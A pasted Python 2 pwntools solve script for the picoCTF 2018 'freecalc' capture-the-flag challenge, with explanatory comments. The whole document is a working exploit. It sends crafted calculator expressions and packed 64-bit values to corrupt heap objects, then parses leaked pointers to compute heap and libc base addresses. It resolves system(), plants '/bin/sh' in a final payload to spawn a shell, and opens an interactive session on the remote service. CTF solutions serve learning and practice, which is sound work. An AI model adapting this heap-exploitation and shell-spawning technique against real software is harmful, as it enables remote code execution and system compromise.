
pico 2018 freecalc

a guest
Oct 13th, 2018
# picoCTF 2018 "freecalc" solve script written against pwntools.  It uses
# Python 2 syntax (`print hex(...)` statements, and `str + p64(...)`
# concatenation, which only works where str is bytes).  Every constant below
# (the 0x601xxx values, the heap offsets, the padding widths) is specific to
# the challenge binary and the bundled libc.so.6; nothing in this file
# derives them, so they cannot be checked from here.
from pwn import *

# Local copy of the target's libc; its symbol table is used further down to
# turn a leaked address into a libc base and to resolve system().
libc = ELF('./libc.so.6')
#r = process('./calc')
r = remote('2018shell3.picoctf.com', 54291)

# Five calculator expressions of the form ": <c> 7 + + + + + + + " for
# c in a..e, concatenated and sent as one line after the ">> " prompt.
f = ['a', 'b', 'c', 'd', 'e']
pay = [': {} 7 + + + + + + + '.format(c) for c in f]
r.sendlineafter('>> ', ''.join(pay))
# Same expression shape for 'f', right-justified with spaces to 0x6f bytes.
r.sendlineafter('>> ', ': f 7 + + + + + + +'.rjust(0x6f, ' '))
# Third line: an ASCII prefix NUL-padded to 0x20 bytes, followed by packed
# little-endian 64-bit values.  The meaning of each (count, address) pair
# depends on the binary's data layout -- presumably objects at 0x601b80..0x601c90
# in its writable segment; not derivable from this script.
pay = ': a 8 + + + + + + + + '
pay += 'f'
pay = pay.ljust(0x20, '\x00')
pay += p64(7) + p64(0x601b80)
pay += p64(6) + p64(0x601c88)
pay += p64(6) + p64(0x601c90)
pay += p64(7) + p64(0x601c88)
pay += p64(5)
r.sendlineafter('>> ', pay)

# Parse the service's "Running ..." output.  Each leaked value is the rest of
# the line with its trailing newline dropped, NUL-padded to 8 bytes and
# unpacked little-endian.  Because of the padding, a short or empty line
# never raises here -- it silently produces a wrong base address.
r.recvuntil('Running ')
r.recvuntil('Running ')
heap = u64(r.recvline()[:-1].ljust(8, '\x00'))
heap_base = heap - 0x470  # 0x470: offset of the leaked pointer into the heap, specific to this challenge (assumed, not verified here)
print hex(heap_base)
r.recvuntil('Running ')
# The third leaked value is treated as the runtime address of free();
# rebasing the ELF object makes libc.symbols['system'] resolve below.
libc.address = u64(r.recvline()[:-1].ljust(8, '\x00')) - libc.symbols['free']
print hex(libc.address)

# Final line: "/bin/sh; f " NUL-padded to 16 bytes, then packed values built
# from the computed heap_base and the resolved system() address.  Any error in
# either base above propagates into these pointers without a check.
pay = '/bin/sh; f '.ljust(16, '\x00')
pay += p64(5) + p64(heap_base+0x450)
pay += p64(heap_base + 0x50) + p64(1)
pay += p64(7) + p64(heap_base+0x28)
pay += p64(libc.symbols['system']) + p64(0)
pay += p64(5) + p64(0)
pay += p64(5)
r.sendlineafter('>> ', pay)

# Hand the connection over to the terminal.
r.interactive()